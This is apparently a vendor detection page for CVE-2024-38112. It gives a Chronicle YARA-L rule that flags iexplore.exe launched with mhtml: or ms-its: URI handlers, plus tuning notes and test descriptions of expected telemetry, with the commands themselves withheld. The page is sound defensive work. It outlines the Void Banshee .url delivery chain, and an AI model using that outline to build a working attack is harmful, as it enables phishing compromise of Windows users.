Detect CVE-2024-38112 - Windows MSHTML Spoofing via .url File Phishing (Void Banshee) in Google Chronicle
Detects exploitation of CVE-2024-38112, a Windows MSHTML spoofing vulnerability actively exploited by the Void Banshee threat group. Attackers deliver crafted .url files that invoke the legacy Internet Explorer MSHTML engine (mhtml: or ms-its: URI handlers) to load remote malicious content, bypassing modern browser security controls. Patch released July 2024; in CISA KEV catalog.
MITRE ATT&CK
YARA-L Detection Query
rule cve_2024_38112_mshtml_url_spoofing {
meta:
author = "df00tech Detection Engineering"
description = "Detects CVE-2024-38112 exploitation: iexplore.exe launched with mhtml/ms-its URI handlers from document or browser parents"
severity = "CRITICAL"
priority = "HIGH"
reference = "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112"
events:
$proc.metadata.event_type = "PROCESS_LAUNCH"
$proc.target.process.file.full_path = /(?i)iexplore\.exe$/
(
$proc.target.process.command_line = /(?i)mhtml:/ or
$proc.target.process.command_line = /(?i)ms-its:/ or
$proc.target.process.command_line = /(?i)mk:@MSITStore/ or
$proc.target.process.command_line = /(?i)its:\/\//
)
(
$proc.principal.process.file.full_path = /(?i)(outlook|winword|excel|powerpnt|explorer|msedge|chrome|firefox)\.exe$/
)
condition:
$proc
}Chronicle YARA-L rule detecting Internet Explorer processes with legacy MSHTML URI scheme arguments spawned by mail or browser processes, covering the CVE-2024-38112 Void Banshee exploitation pattern.
Data Sources
Required Tables
False Positives & Tuning
- Legacy enterprise line-of-business applications that use iexplore.exe with mhtml: for report rendering
- IT help systems using CHM files (ms-its: protocol) launched from Office applications
- Security red team exercises in environments where IE is still present and targeted
Other platforms for CVE-2024-38112
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Simulate CVE-2024-38112: mhtml URI via crafted .url file
Expected signal: Sysmon EventID 11 for .url file creation in %TEMP%; Sysmon EventID 1 for explorer.exe launching iexplore.exe with mhtml: in the command line; Sysmon EventID 3 for iexplore.exe attempting outbound connection to 192.168.100.200:80
- Test 2Simulate CVE-2024-38112: ms-its URI handler via .url file
Expected signal: Sysmon EventID 1 for iexplore.exe or hh.exe with ms-its: in CommandLine; Sysmon EventID 3 for outbound HTTP to 192.168.100.200; Sysmon EventID 11 for .url file creation
- Test 3Simulate Void Banshee delivery chain: Outlook attachment drop and .url execution
Expected signal: Sysmon EventID 11 for .url file in Outlook INetCache path; Sysmon EventID 1 for cmd.exe parent and iexplore.exe child with mhtml: CommandLine; Sysmon EventID 3 for iexplore.exe outbound connection attempt; Windows Security EventID 4688 for process creation chain
Unlock Pro Content
Get the full detection package for CVE-2024-38112 including response playbook, investigation guide, and atomic red team tests.